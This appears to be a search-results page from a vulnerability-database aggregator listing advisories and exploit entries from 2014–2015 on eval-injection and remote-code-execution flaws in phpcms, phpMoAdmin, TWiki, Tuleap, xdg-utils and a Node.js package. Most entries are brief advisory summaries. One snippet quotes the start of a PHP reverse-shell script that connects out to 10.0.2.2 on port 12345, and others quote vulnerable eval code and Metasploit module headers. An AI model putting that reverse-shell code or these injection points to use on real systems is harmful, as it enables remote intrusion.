Lucene search
+L

2918 matches found

myhack58
myhack58
added 2015/04/23 12:00 a.m.19 views

phpcms front Desk arbitrary code execution php must be less than 5. 3-the vulnerabilities and early warning-the black bar safety net

phpcms v9 string2arrayfunction using the eval function,in more than one place may cause code execution vulnerability /phpssoserver/phpcms/libs/functions/global.func.php | 1 2 3 4 5 6 7 8 9 1 0 1 1 | / Converts a string to an array @param string $data the string @return array returns the array...

2.7AI score
SaveExploits0
rdot
rdot
added 2015/04/08 12:00 a.m.830 views

PHP reverse eval shell

Сделан для прокидывания через RCE при ограничениях exec и подобному. Использует только fsockopen и eval Форкается если есть pcntlfork PHP код: settimelimit0; if functionexistspcntlfork $pid = pcntlfork; if$pid==1 exit1; if$pid exit0; ifposixsetsid==1 exit1; $sock = fsockopen'10.0.2.2',12345,...

1.7AI score
SaveExploits0
myhack58
myhack58
added 2015/03/19 12:00 a.m.31 views

MongoDB management tool exposure remote code execution vulnerability-vulnerability warning-the black bar safety net

MongoDB, the IT sector mainstream non-relational database NoSQL platform is one that is based on a table of a relational database of the popular alternatives. Recently, the management for MongoDB is a GUI tool phpMoAdmin is the storm has a very serious security vulnerability, once exploited, this...

0.1AI score
SaveExploits0
zdt
zdt
added 2015/03/19 12:00 a.m.58 views

TWiki Debugenableplugins Remote Code Execution Exploit

TWiki versions 4.0.x through 6.0.0 contain a vulnerability in the Debug functionality. The value of the debugenableplugins parameter is used without proper sanitization in an Perl eval statement which allows remote code execution. This module requires Metasploit: http://metasploit.com/download...

0.2AI score0.55637EPSS
SaveExploits12
Exploit DB
Exploit DB
added 2015/03/19 12:00 a.m.56 views

TWiki Debugenableplugins - Remote Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 'TWiki Debugenableplugins Remote Code Execution', 'Description' = %q TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug...

9.1CVSS8.2AI score0.55637EPSS
SaveExploits12
seebug.org
seebug.org
added 2015/03/11 12:00 a.m.25 views

phpMoAdmin 1.1.3 /moadmin.php 代码执行漏洞

/moadmin.php / Saves an object @param string $collection @param string $obj @return array / public function saveObject$collection, $obj eval'$obj=' . $obj . ';'; //cast from string to array return $this-mongo-selectCollection$collection-save$obj; …. $action = isset$GET'action' ? $GET'action' :...

6.9AI score
SaveExploits0
myhack58
myhack58
added 2015/02/20 12:00 a.m.19 views

Zhcms v1. 0 sql injection+arbitrary code execution-vulnerability warning-the black bar safety net

Author:Sco4x0 blog:www.sco4x0.com Team: www.secbox.cn A: sql injectioncauses the backend login bypass See UserAction. class. the php processing code in the Login method public function login if! empty$POST'code' if! empty$POST'user' && ! empty$POST'passwd' $rs = $this-user-login$POST'user',...

0.4AI score
SaveExploits0
CNVD
CNVD
added 2015/01/23 12:00 a.m.10 views

xdg-utils Eval Injection Vulnerability

xdg-utils is a set of command line tools used to help applications integrate with various desktop tasks. An Eval injection vulnerability exists in xdg-utils version 1.1.0 RC1. An attacker can exploit this vulnerability to execute arbitrary code with the help of the 'URL' parameter...

6.8CVSS8.2AI score0.03256EPSS
SaveExploits1References1
Prion
Prion
added 2015/01/21 6:59 p.m.24 views

Design/Logic Flaw

Eval injection vulnerability in xdg-utils 1.1.0 RC1, when no supported desktop environment is identified, allows context-dependent attackers to execute arbitrary code via the URL argument to xdg-open...

6.8CVSS8.1AI score0.03256EPSS
SaveExploits1References8Affected Software1
UbuntuCve
UbuntuCve
added 2015/01/21 6:59 p.m.24 views

CVE-2014-9622

Eval injection vulnerability in xdg-utils 1.1.0 RC1, when no supported desktop environment is identified, allows context-dependent attackers to execute arbitrary code via the URL argument to xdg-open...

6.8CVSS7.3AI score0.03256EPSS
SaveExploits1References1
OSV
OSV
added 2015/01/21 6:59 p.m.8 views

UBUNTU-CVE-2014-9622

Eval injection vulnerability in xdg-utils 1.1.0 RC1, when no supported desktop environment is identified, allows context-dependent attackers to execute arbitrary code via the URL argument to xdg-open...

6.8CVSS7.6AI score0.03256EPSS
SaveExploits1References2
Debian CVE
Debian CVE
added 2015/01/21 6:00 p.m.57 views

CVE-2014-9622

Eval injection vulnerability in xdg-utils 1.1.0 RC1, when no supported desktop environment is identified, allows context-dependent attackers to execute arbitrary code via the URL argument to xdg-open...

6.8CVSS6.9AI score0.03256EPSS
SaveExploits1
CVE
CVE
added 2015/01/21 6:00 p.m.80 views

CVE-2014-9622

CVE-2014-9622 covers an eval-injection in xdg-utils 1.1.0 RC1 where, if no supported desktop environment is identified, an attacker can cause xdg-open to execute arbitrary commands via the URL argument. The vulnerability is treated as a remote-code-execution risk affecting Linux distros, with CVS...

6.8CVSS8.7AI score0.03256EPSS
SaveExploits1References8Affected Software1
Exploit DB
Exploit DB
added 2014/12/15 12:00 a.m.35 views

Tuleap - PHP Unserialize Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 'Tuleap PHP Unserialize Code Execution', 'Description' = %q This module exploits a PHP object injection vulnerability in Tuelap...

6CVSS5.2AI score0.14766EPSS
SaveExploits7
zdt
zdt
added 2014/12/13 12:00 a.m.84 views

Tuleap PHP Unserialize Code Execution Exploit

This Metasploit module exploits a PHP object injection vulnerability in Tuelap 'Tuleap PHP Unserialize Code Execution', 'Description' = %q This module exploits a PHP object injection vulnerability in Tuelap = 7.6-4 which could be abused to allow authenticated users to execute arbitrary code with...

6CVSS7.5AI score0.14766EPSS
SaveExploits7
NVD
NVD
added 2014/12/11 11:59 a.m.24 views

CVE-2014-7192

Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rational Application Developer and other products, allows remote attackers to execute arbitrary code via a crafted file...

10CVSS7.5AI score0.13048EPSS
SaveExploits2References4
UbuntuCve
UbuntuCve
added 2014/12/11 11:59 a.m.36 views

CVE-2014-7192

Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rational Application Developer and other products, allows remote attackers to execute arbitrary code via a crafted file...

10CVSS6.2AI score0.13048EPSS
SaveExploits2References1
OSV
OSV
added 2014/12/11 11:59 a.m.7 views

UBUNTU-CVE-2014-7192

Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rational Application Developer and other products, allows remote attackers to execute arbitrary code via a crafted file...

10CVSS6.2AI score0.13048EPSS
SaveExploits2References2
CVE
CVE
added 2014/12/11 11:00 a.m.69 views

CVE-2014-7192

CVE-2014-7192 affects the syntax-error npm module (before 1.1.1) used with Node.js 0.10.x, including in IBM Rational Application Developer and related IBM/RSA products. The vulnerability stems from improper input handling in the syntax-error/index.js file, enabling remote attackers to execute arb...

10CVSS7.6AI score0.13048EPSS
SaveExploits2References4Affected Software1
CNVD
CNVD
added 2014/12/02 12:00 a.m.7 views

phpcms background arbitrary code execution vulnerability

phpcms is an open source content management system. phpcms backend exists arbitrary code execution vulnerability , due to phpcms source code program in many places using the string2array function , the function's parameters are directly executed by eval , so as long as there is a call to the...

8.2AI score
SaveExploits0
Rows per page
Query Builder